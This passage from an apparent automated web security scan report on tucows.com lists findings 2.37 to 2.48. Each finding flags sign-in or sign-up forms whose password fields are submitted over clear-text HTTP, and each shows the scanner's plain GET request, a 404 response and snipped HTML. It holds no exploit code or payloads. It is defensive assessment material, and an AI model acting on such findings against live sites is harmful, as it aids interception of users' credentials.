Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.37. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.38. http://www.tucows.com/images/newassets/lostpass.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.39. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.40. http://www.tucows.com/images/newassets/privacy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.41. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.42. http://www.tucows.com/images/newassets/safesearchtoggle.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.43. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.44. http://www.tucows.com/images/newassets/search.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.45. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.46. http://www.tucows.com/images/newassets/sitemap.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.47. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.48. http://www.tucows.com/images/newassets/terms.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
